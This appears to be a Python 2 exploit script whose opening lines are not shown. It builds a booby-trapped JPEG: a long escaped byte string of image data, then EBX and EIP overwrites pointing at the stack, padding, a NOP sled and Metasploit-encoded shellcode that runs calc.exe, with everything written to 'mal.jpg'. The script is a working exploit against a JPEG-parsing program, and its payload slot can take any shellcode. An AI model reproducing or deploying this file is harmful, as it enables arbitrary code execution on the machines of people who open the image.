\x4F\x7F\xF3\x3F\xCE\x2C\x27\xE2\x60\xE5\xFA\x58\xBD\x3F\x1D\xB5\x7D\x9D\xAE\x36\x64\xBE\xC2\xEB\x2D\x71\x3B\x9E\xF7\x32\x7D\x3A\xA9\xAF\xD9\x56\x2D\x7B\x19\xF9\xF6\xDB\x65\xAF\x50\xC3\xE9\x58\xB6\x86\xDB\x63\xDD\x65\x47\x53\x53\x4C\x7C\x8B\xB5\x72\xD4\x65\x55\xD5\x63\x5B\x87\x5B\x5A\x2B\xAA\xCB\x0D\x65\xC1\xBA\x0D\x85\xDF\xA6\xB4\xFD\x3D\xAD\xF6\x7A\x8A\xC6\x5E\x6A\xC0\x84\x3E\x71\xD7\xC5\x39\x73\x99\x50\xEA\x3A\xBF\xFF\xD2\xE6\x99\x4E\x45\xD6\x6D\xA9\xA2\x49\x80\x4C\xED\x93\xFB\xDA\x2E\xAB\xA6\xFD\x4C\xC2\x7E\x05\x57\xF4\xE1\x17\xBB\xD0\xAD\xCE\x22\x37\x39\xCF\x77\xDA\x2C\x92\x6C\xDA\xFA\xA9\xB1\x95\xFB\x7F\x3F\x1F\xD4\xFF\x00\x08\xB2\xCF\x50\xC7\xBF\x0D\xB9\x14\x51\x56\x26\x55\x5B\x8D\xB5\xD6\xD7\x34\x59\xB8\x31\xAC\xB3\xD1\x73\x59\xE9\x6F\xFF\x00\x09\x53\x7F\x99\xB3\xF9\xBF\x5A\xBF\x4F\xD2\xD7\xE9\x3F\x58\x5F\x83\x8B\x5D\x97\x38\x7D\x99\x8F\x25\xC2\xBD\x5C\xD0\x5A\xE7\x3B\x7B\x47\xEE\x1C\x6B\x1A\xC7\x5B\xFF\x00\x9E\xD4\x23\x0E\x3C\x78\x84\x65\x1F\x74\xE5\x23\xE5\xF9\x7D\x3F\xA2\xD8\xC5\xCA\xC7\xDA\x24\xD4\x73\xBD\x5B\xFA\x68\x7E\x8B\x4F\xA9\xF4\xF3\x55\xF6\xDB\x40\x0C\xC5\xB7\x21\xF4\xE1\x35\xCE\x25\xCF\x6D\x67\xCE\xB6\xBD\xD3\xBE\xBD\xCD\xFA\x5F\xBF\x62\xA2\xFA\x0B\x65\xC4\xEA\xDF\x6B\xDB\xDC\x1E\x76\xB8\x2A\xBD\x7B\xEB\x23\x72\xFA\x8E\x3E\x56\xE1\xF6\x37\x97\x55\xE9\xED\x3B\x69\xA4\x6D\x6E\x3B\x1B\xB9\xAD\xD9\xB7\xF9\xCB\x3F\xD2\x29\x38\x96\x35\xD2\xE1\x4B\x20\xCD\x9A\x06\x0F\xEB\xA2\x25\x66\xE6\xC3\x59\x00\x88\x31\x13\x35\x1E\x2F\x45\xEB\xC3\xFA\x5F\x2B\x46\x63\xD5\x43\xA9\xF4\xDF\xA5\xA3\xB7\xF1\xAA\xC4\xF4\x72\x9C\xC0\xCC\x7B\x1F\x5C\x3C\x7E\xEB\xB7\xD6\xE6\x7E\xEB\xB6\x3D\x8B\x9F\x76\x26\x4B\xEC\xB3\xD3\xA5\xEF\x68\x73\xBD\xC1\xA6\x39\x5D\xFF\x00\x52\xC2\xE8\xC4\xB7\x21\xB5\x11\x6E\xCC\xBA\xAB\x2D\xC7\x10\xEA\x58\xEA\xAB\xD6\xFC\x57\x30\x7F\x35\x91\x5D\x9B\x9F\xFF\x00\x17\xFC\xB5\x77\xEB\x46\x27\xD5\xEC\x06\xB6\xCA\x9C\x37\x2C\xF2\xB6\xBD\xD8\xF4\x8D\xC7\x71\xDB\xEA\xE5\xDC\xC6\xFB\xCD\xF5\x36\xFA\x7B\x2D\x7D\x1F\xA6\xB2\xCB\xBF\xC1\xAB\xDE\xD4\xB0\x09\xC8\x11\x29\xFC\xD2\x81\xE9\xF4\x6C\x4F\x0C\xF1\xC0\xCC\xF5\x37\x4F\x9A\xD1\xBA\x6D\x3E\xA1\xB7\x2E\x43\xD8\xE8\x14\xB9\xA4\x47\x7D\xEE\xDC\xB4\xBA\x5D\x4D\x38\xF4\x16\x98\xB0\x02\x1D\xE3\x2D\x2F\x88\xFE\xB6\xD5\x0B\x59\x7B\x9E\xD7\x06\xB7\x1D\xA0\xCC\x6E\x73\xDC\x40\xD0\xEE\xF4\x36\xD7\xFE\x6D\xB6\xAC\xEA\x7A\xB5\xB8\x4D\xA5\xF5\x7A\x46\xA7\x17\xB6\xF6\x6E\x2F\x2F\x69\x73\xBF\x9E\xA4\xFF\x00\x36\xD6\xFF\x00\x83\x50\x88\xCB\x39\x3C\x52\x23\x88\x8D\xBD\x42\x1E\x99\xFF\x00\x8C\xC0\x07\x19\xD4\x91\x7F\x5E\x17\xD3\xF1\xB0\xBA\x6D\xF8\x65\x96\x33\xED\x42\xCA\x8B\x33\x31\xDF\x63\x9D\x5D\xD9\x3F\x6F\xAD\x7E\x31\x7E\xEF\x4E\xCA\x9D\xB2\xFA\xB6\x7E\x93\xFC\x17\xEE\x2C\x0E\xB9\xF5\x38\xD3\x75\x35\x60\x6E\xAC\x55\xF6\xCB\x33\x2D\x67\x23\x1D\xB6\xD3\x5F\x4D\xC7\xA4\xFD\x16\xFE\x8D\xFE\x87\xD3\xFF\x00\xB9\x39\x16\xFE\x89\x5D\xE9\x7D\x52\x91\x8C\xCA\xB1\xAD\x6B\x5F\x90\x43\x2B\xB6\x37\x06\x6E\x1E\xEB\x3D\x3B\x36\xB9\x57\xEB\x91\x77\x27\xA8\xD0\xDC\x7A\x32\xE9\xC1\x73\x23\xD5\x2E\x70\x3E\xA1\x63\xBF\x46\xCC\xB7\x35\xCC\xA7\x1A\xAB\x36\xFA\xF7\xB3\xD5\xB7\xD3\xF5\x3D\x1F\x4A\xD5\xA1\xC3\x88\xC8\xC2\x30\x88\x86\xED\x5C\x27\xFB\x8E\x9C\xB9\x7C\x54\x0C\x44\x78\x7F\xAB\xFA\x5B\x7C\xBF\xDE\x6A\xFD\x48\xC5\xA6\xD6\xD9\x8C\x6A\xDA\x01\xB8\x75\x0B\xDC\x67\x75\x4E\x6E\xDF\x49\xAF\x25\xBE\x86\xC7\xB3\xF9\xC5\x8D\x98\xCF\x4B\x9C\x21\xFE\xA1\x0E\xAE\xB7\xB4\x1A\xDC\x60\x90\x4B\x25\x92\x3D\xCD\xB1\xFF\x00\x9F\xFB\x8A\xCF\x51\xF4\x3A\x70\xBB\x23\x02\xCA\x32\xAB\xBB\x73\x1C\x31\x9F\x65\x95\x35\xD6\x02\x2B\xF5\x1C\xFC\x7C\x7A\x7F\xD2\x3A\xA6\x36\xCB\x77\xFD\x35\xC9\x8B\x2E\x2D\x78\x2F\x74\x06\xED\x22\x4E\xA2\x67\x6F\xF5\x7F\xC2\x28\xF9\xAC\x71\xC9\xED\x88\x90\x3D\xB3\xDB\xF4\x58\x39\xC1\x8C\xFB\x51\x81\x1E\x80\x76\xED\xFF\x00\xA1\x37\xEA\xCB\xC3\xC1\x98\x22\xA6\x82\xD3\x59\xDA\x1C\xD9\x25\xC5\xBE\xBE\xEB\x3B\x5B\xB9\xEA\xAE\x6D\xB9\x17\x1A\xAC\xBC\x16\xB6\xD0\x5D\x55\x53\xA8\x64\xED\x0E\x73\x8F\xEF\xB9\xAA\xBB\x6A\x75\x87\xDB\x1E\x65\xC4\x34\x69\xAF\xD2\x74\x35\x1E\xAC\x1B\x6F\xAD\x96\x35\xC2\xD7\x91\xFC\xC8\xDC\x5E\x1A\x3E\x8F\x6D\xAD\x67\xF6\x93\x38\x21\x03\xC6\x4E\xBB\x13\x2D\x7A\x7F\xCD\x6A\xFA\x46\xAF\xFF\xD3\xC1\xC4\xEA\xB8\xB8\xBB\xEF\xB6\x9A\x73\x1C\xC9\xD8\xCB\xBD\xEC\x2E\x68\xF7\x35\x8C\xDC\xDA\xF2\x3D\xCE\xDA\x87\x73\x9F\x9B\x90\xC7\xE7\x52\xCA\x7D\x66\x97\x1A\x71\x41\xAA\xB0\x6A\xDB\xE9\xFE\x88\xBD\xFE\xA3\xAB\xAC\xFE\x7B\x96\x47\x5C\xBB\x1F\x65\x14\xB3\x4C\x8A\x5C\x63\x6E\x9B\x19\x03\xD9\xFE\x7F\xB9\xAA\x78\xFD\x73\xD4\xF4\x0E\x4B\x49\xB2\x4E\x51\x58\xF6\xC4\x3A\xA2\x3D\x3B\x3D\x9F\xE9\x3D\xDB\x96\x78\x8E\x5F\x68\x1C\x76\x01\xE2\xD3\xE5\x9F\xF5\x7F\xC6\x63\x1C\x7C\x34\x0D\x0D\x74\x1A\x3B\x19\x8F\xEA\x78\x18\xA3\x37\xA4\xE4\xD4\xC1\x48\x26\xC3\xB5\xAE\x71\x6E\x83\xD4\x02\xD6\x59\xEE\x67\xBB\xD4\x66\xD5\x47\xAF\xE1\x8B\xD8\xFE\xA1\x70\x65\x99\x4C\xD9\xEB\x7A\x6D\x15\xD7\x71\x3B\x6A\x73\xBD\x1C\x71\x5B\x6B\xB1\xEE\xF7\xFE\x87\x62\x6B\xFA\xDF\x4A\x35\xBD\x83\x75\x8C\x7F\xD3\xAF\x61\x1B\x81\x11\xF4\x97\xF7\x2A\x78\x79\xB1\x75\x6D\xF5\xED\xDC\xEA\xB4\x6E\xFE\xC0\x7D\x0F\xFA\x09\x42\x5C\xD1\x11\x94\xE5\x3F\xD5\xCB\xF4\xBE\x69\xC1\x5F\xA2\x8E\x2C\x94\x09\x24\xD7\x77\xA0\xC0\x2F\x67\x45\xAD\xF8\x95\x8C\x4C\xA6\xB5\xED\x65\x56\x64\x3A\xFF\x00\xD1\xD8\x0F\xAD\xBB\x18\xD1\xF4\xB5\x7F\xA3\xDD\xE9\xFD\xA7\xD4\xF7\xFF\x00\x36\xB2\x4E\x63\x3A\x6F\x50\xB1\xD9\x2E\xB2\xC3\x93\x53\x6C\x7D\xA3\xDC\xF3\xB0\xB9\xCF\x75\xC7\x5F\x66\xFD\xF6\x23\x57\x9C\x1D\x5B\x99\x8F\x69\xF5\xA3\xD8\x6B\x1E\xA6\xBF\xBA\xE6\xFD\x0D\xAF\xFA\x2B\x17\x35\xCF\xB6\xF3\xEA\xB8\xB5\xED\xF6\xFB\x84\xE8\xDF\x63\x5A\xDF\xE4\x7B\x53\xC7\x16\x79\x11\x93\x48\xD6\xB1\xD8\xFF\x00\x56\x49\x39\x72\x4C\x54\xCF\xA4\x74\x1A\x3A\x96\x7D\x61\xC1\x9F\x6D\xD3\xB8\x8F\xA3\xA3\x5B\xF0\xFC\xE5\x83\x65\xB6\x5B\xB1\xAE\xD7\x63\x76\x30\x01\xDA\x4B\xBF\xCE\x73\x9C\x93\x59\x2E\x33\xA8\x07\xB2\xBF\xD3\xCE\x43\x09\x75\x2E\x6D\x6C\x6E\xB6\x3E\x01\x20\x0E\xFB\x3E\x9B\xFF\x00\x93\xF9\x8A\x51\x8E\x18\x41\x31\x1A\xFF\x00\x58\xA8\x54\x76\x0D\x6C\x5C\xFE\xA3\x8B\x5B\xEA\xC3\xB6\xCA\x9B\x77\xD3\x15\x8D\x4C\x7F\x2A\x37\x7F\x9A\x8E\xE2\xDB\x31\xEE\x00\x09\xAC\x35\xC0\x7F\x24\x86\xB8\x34\x2D\x2A\x6C\xC7\xC6\xC5\xC9\xB5\x87\xD4\x6D\x2F\x3B\x40\x91\xBB\x7B\xBF\x45\xFE\x72\xAB\x94\xFC\x1B\xAB\xB8\x39\xE1\xB6\x39\xE5\xF4\x59\xB4\x97\x00\x5A\xD7\x7B\xB6\xFE\x63\xFE\x82\x61\xCB\xC7\x2F\x90\x81\x13\xF3\x0D\x7F\x76\x5B\x2E\xE2\xBD\x0F\xE8\x95\x59\x95\x9D\x9B\x8D\x8F\x83\x91\x91\x65\x98\x98\x01\xDF\x62\xAE\x44\x31\x8F\x77\xE6\xBA\x37\x3F\xFB\x7F\x99\xFA\x3F\xE6\xD0\xAA\xE9\xDE\xAD\xCD\xA8\xB9\xC1\x65\x16\xC1\xD3\x99\xDA\x65\xC7\xE8\xFB\x1C\x87\x56\x69\xAA\x43\xEC\x79\x61\xD0\xEA\xC0\x11\x1E\xDD\xBC\xF0\x87\xF6\xEC\xFB\x08\x0D\x79\x01\xC6\x00\x64\x34\x4F\xF6\x53\x88\xCA\x6E\x88\x1D\x2C\xA0\xC4\x93\x77\xD1\xDE\x1D\x13\x0F\x1F\x6C\xB7\xD5\x81\x20\xBC\xEE\x1F\xE6\x7D\x05\x71\xC5\xB6\xA3\xBB\x7B\x05\xA7\x1D\xA5\xEC\x06\x22\x1A\x35\xAF\x59\xF6\x55\x59\x55\x67\xF5\x3A\xEA\x73\xEF\x68\xC8\x0D\x12\x48\x70\x0E\x00\x0F\xEA\xB7\x72\xC9\x7F\x50\xEA\x16\x59\xEA\x1B\xDE\xD3\xC8\x0D\x71\x0D\x1F\x06\x0F\x6A\x86\x1E\x5F\x2E\x42\x78\xA6\x0F\x0F\xE9\x5F\x13\x1F\x01\x3B\x90\xFF\x00\xFF\xD4\xF2\xF3\x32\x67\x9E\xA4\xE2\xA7\x4C\xEF\xD3\x8D\xAE\xDD\xF0\x85\x5D\x24\x25\xB1\xF2\x50\x4B\xD9\x8A\xDD\x23\x6C\xEE\xED\x1C\xA0\xA4\x92\x1D\x96\x7E\xD4\x81\xEA\x4F\xA7\x1A\xFA\x7F\x4B\xFE\x8F\xB9\x57\xCF\x99\x6E\xD8\x89\x7F\x33\xBE\x27\xFC\x26\xF5\x9C\x92\xAD\x8F\xE7\x1F\x2F\xF8\x1F\x2F\xF8\x4B\x06\xFD\x37\x74\x30\x3E\xCD\xBF\xF5\x8F\xE6\xE7\x5E\x63\xFF\x00\x03\xF7\xAD\x9C\x4F\xB0\x43\xFE\xCB\x3B\x7F\x3B\x76\xFD\xBF\xF8\x2F\xB3\x72\xE5\x92\x4C\xE6\xB7\x3F\x3F\xD3\xF9\xAF\xAA\xA7\xBB\xD1\x67\x7F\xC9\x8D\xFB\x3F\xA7\xF6\x5D\xCD\xF5\x36\x4E\xFD\xD3\xF9\xFB\xBF\x3B\xE8\xAC\xC7\xC6\xF1\x3C\x43\x7E\xED\xA1\x50\x49\x3B\x07\xCA\x7F\xBD\x2F\xEF\x7F\x85\xFD\x21\x0E\xBE\x6D\xF6\xFD\xE2\xF4\x1F\x6A\xDD\xE9\x4B\xF7\x7A\x71\x33\xBB\xFE\xA5\x6A\x33\xF6\x27\xA5\xFA\x1F\x4A\x76\x3B\x6F\xEF\xCC\x18\xFA\x5E\xEF\x57\xF7\x17\x38\x92\x59\xFA\x7F\x39\xB9\xF9\x3E\x4D\xE5\xBA\x67\xF5\xFA\x3D\x1D\x1F\x68\xDC\xCF\x56\x36\x4B\x77\x7A\x5B\x66\x7B\xEE\xF5\xBF\x35\x64\x3F\xD3\xF5\x1D\xE9\x4F\xA5\xB8\xEC\xDD\x1B\xB6\xCF\xB7\x74\x2A\x69\x25\x83\xE6\x96\xDD\x3E\x55\x81\xFF\xD9\x38\x42\x49\x4D\x1E\x21\x1A\x56\x65\x72\x73\x69\x6F\x6E\x20\x63\x6F\x6D\x70\x61\x74\x69\x62\x69\x6C\x69\x74\x79\x20\x69\x6E\x66\x6F\x00\x00\x00\x00\x55\x00\x00\x00\x01\x01\x00\x00\x00\x0F\x00\x41\x00\x64\x00\x6F\x00\x62\x00\x65\x00\x20\x00\x50\x00\x68\x00\x6F\x00\x74\x00\x6F\x00\x73\x00\x68\x00\x6F\x00\x70\x00\x00\x70\x13\x00\x41\x00\x64\x00\x6F\x00\x62\x00\x65\x00\x20\x00\x50\x00\x68\x00\x6F\x00\x74\x00\x6F\x00\x73\x00\x68\x00\x6F\x00\x70\x00\x20\x00\x36\x00\x2E\x00\x30\x00\x00\x00\x01\x00\x38\x42\x49\x4D\x04\x06\x0C\x4A\x50\x45\x47\x20\x51\x75\x61\x6C\x69\x74\x79\x00\x00\x00\x00\x07\x00\x01\x00\x00\x00\x01\x01\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00\x00\x01\xFF\xDB\x00\x84\x00\x0C\x08\x08\x08\x09\x08\x0C\x09\x2F\x0C\x06\x0B\x0A\x0B\x11\x15\x0F\x0C\x0C\x0F\x15\x18\x13\x13\x80\x13\x13\x18\x11\x0C\x0C\x0C\x0C\x0C\x0C\x11\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x38\x0C\x01\x0D\x0B\x0B\x0D\x0E\x0D\x10\x0E\x0E\x10\x14\x0E\x0E\xD2\x14\x14\x0E\x0E\x0E\x0E\x14\x10\x0C\x0C\x0C\x0C\x0C\x11\xA1\x0C\x0C\x0C\x0C\x0C\x0B\x11\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\xFF\xC0\x00\x11\x08\x02\x58\x03\x20\x03\x01\x31\x00\x02\x11\x01\x03\x11\x01\xFF\xDD\x00\x04\x00\x32\xFF\xC4\x01\x3F\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x03\x00\x01\x02\x04\x05\x06\x07\x08\x09\x0A\x0B\x01\x00\x01\x05\x01\x01\x01\x01\x5F\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x10\x00\x01\x04\x01\x03\x02\x04\x02\x05\x07\x06\x08\x05\x03\x0C\x33\x01\x00\x02\x11\x03\x04\x21\x12\x31\x05\x41\x51\x61\x13\x22\x71\x81\x32\x06\x14\x91\xA1\xB1\x42\x23\x24\x15\x52\xC1\x62\x33\x34\x72\x82\xD1\x43\x07\x25\x92\x53\xF0\xE1\xF1\x63\x73\x35\x16\xA2\xB2\x83\x26\x44\x93\x54\x64\x45\xC2\xA3\x74\x36\x17\xD2\x55\xE2\x65\xF2\xB3\x84\xC3\xD3\x75\xE3\xEB\x46\x27\x94\xA4\x85\xB4\x95\xC4\xD4\x71\xF4\xA5\xB5\xC5\xD5\xE5\xF5\x56\x66\x76\x86\x96\xA6\xB6\xC6\xD6\xE6\xF6\x37\x47\x57\x67\x77\x87\x97\xA7\xB7\xC7\xD7\xE7\xF7\x11\x00\x02\x02\x01\x02\x04\x04\x03\x04\x05\x06\x07\x07\x06\x05\x35\x01\x00\x02\x11\x03\x21\x31\x12\x04\x41\x51\x61\x71\x55\x13\x05\x32\x81\x91\x14\xA1\xB1\x42\x23\xC1\x52\xD1\xF0\x33\x24\x62\xE1\x72\x82\x92\x43\x53\x15\x63\x73\x34\xF1\x25\x06\x16\x2E\xB2\x83\x07\x26\x35\xC2\xD2\x44\x93\x54\xA3\x17\x64\x45\x55\x36\x74\x65\xE2\xF2\xB3\x84\xC3\xD3\x75\xE3\xF3\x46\x94\xA4\x85\xB4\x95\xC4\xD4\xE4\xF4\xA5\xB5\xC5\xD5\xE5\xF5\x56\x66\x76\x86\x96\xA6\xB6\xC6\xD6\xE6\xF6\x27\xAB\x47\x57\x67\x77\x87\x97\xA7\xB7\xC7\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xA3\xD5\xF2\xEC\xAF\x08\xCD\xBB\x64\x7D\x19\xD4\xAE\x0E\xEC\x8B\x9D\x61\x3E\xA3\x8C\x9F\x12\xAF\x75\xAC\xFB\x6F\xC8\x73\x4B\x48\xB3\xC2\xCB\x54\xF9\x1C\x1E\xD6\x3B\x3B\xCB\x54\x93\xD1\x9F\xC6\x77\xFA\x47\x7D\xE5\x2F\x5A\xEF\xF4\x8E\xFB\xCA\x82\x4A\xDA\xD6\x7E\xB5\xDF\xE9\x1D\xF7\x94\xBD\x6B\xBF\xD2\x3B\xEF\x2A\x09\x24\xA6\x7E\xBD\xDF\xE9\x1D\xF7\x94\xBD\x6B\xBF\xD2\x3B\xEF\x2A\x09\x24\xA6\x7E\xBD\xDF\xE9\x1D\xF7\x94\xFE\xB5\xDF\xE9\x1D\xF7\x94\x34\x92\x52\x4F\x5E\xEF\xF4\x8E\xFB\xCA\xBF\xD3\xBA\xC5\xF8\x6F\x0E\xDC\x69\x3C\xC9\x59\x89\x26\xCE\x11\x9C\x4C\x64\x2C\x15\x3D\x96\x3F\xD6\xF6\x3C\x43\xC9\x6A\xB9\x4F\x5F\xA6\xE3\xB5\xB6\x41\xF8\xAE\x09\x4A\xE4\x9F\x5B\x83\x9A\x60\xAA\x73\xF8\x6E\x23\x7C\x37\x12\x8A\x0F\xA4\x53\x93\x6D\x9F\x9C\x7E\xF5\x61\x8E\xB0\xEA\x5C\x63\xC2\x4A\xE0\x99\xF5\x87\x0F\x8C\x0C\x6B\xB8\x56\x71"
d += "\x86\xf4\x12\x00" 	#EBX
d += "\x42"*24				#Padding
d += "\x86\xf4\x12\x00"   	#EBX
d += "\x43"*8				#Padding
d += "\xA6\xF4\x12\x00" 	#EIP - > 0012F4A6 on Stack
d += "\x50"*12   			#Padding
d += "\x86\xf4\x12\x00"   	#EAX
d += "\x90"*10				#NOPs

#windows/exec - 227 bytes
#http://www.metasploit.com
#Encoder: x86/shikata_ga_nai
#EXITFUNC=process, CMD=calc.exe, VERBOSE=false

d += ("\xbd\x86\x9f\x31\x9b\xdb\xdf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x33\x83\xc0\x04\x31\x68\x0e\x03\xee\x91\xd3\x6e\x12\x45\x9a"
"\x91\xea\x96\xfd\x18\x0f\xa7\x2f\x7e\x44\x9a\xff\xf4\x08\x17"
"\x8b\x59\xb8\xac\xf9\x75\xcf\x05\xb7\xa3\xfe\x96\x79\x6c\xac"
"\x55\x1b\x10\xae\x89\xfb\x29\x61\xdc\xfa\x6e\x9f\x2f\xae\x27"
"\xd4\x82\x5f\x43\xa8\x1e\x61\x83\xa7\x1f\x19\xa6\x77\xeb\x93"
"\xa9\xa7\x44\xaf\xe2\x5f\xee\xf7\xd2\x5e\x23\xe4\x2f\x29\x48"
"\xdf\xc4\xa8\x98\x11\x24\x9b\xe4\xfe\x1b\x14\xe9\xff\x5c\x92"
"\x12\x8a\x96\xe1\xaf\x8d\x6c\x98\x6b\x1b\x71\x3a\xff\xbb\x51"
"\xbb\x2c\x5d\x11\xb7\x99\x29\x7d\xdb\x1c\xfd\xf5\xe7\x95\x00"
"\xda\x6e\xed\x26\xfe\x2b\xb5\x47\xa7\x91\x18\x77\xb7\x7d\xc4"
"\xdd\xb3\x6f\x11\x67\x9e\xe5\xe4\xe5\xa4\x40\xe6\xf5\xa6\xe2"
"\x8f\xc4\x2d\x6d\xd7\xd8\xe7\xca\x27\x93\xaa\x7a\xa0\x7a\x3f"
"\x3f\xad\x7c\x95\x03\xc8\xfe\x1c\xfb\x2f\x1e\x55\xfe\x74\x98"
"\x85\x72\xe4\x4d\xaa\x21\x05\x44\xc9\xa4\x95\x04\x20\x43\x1e"
"\xae\x3c")
raw_input('[*] Press Enter to generate the malicious JPEG file: ')
f = open('mal.jpg','w')
f.write(d)
f.close()
print "[*] Malicious JPEG File generated Successfully.."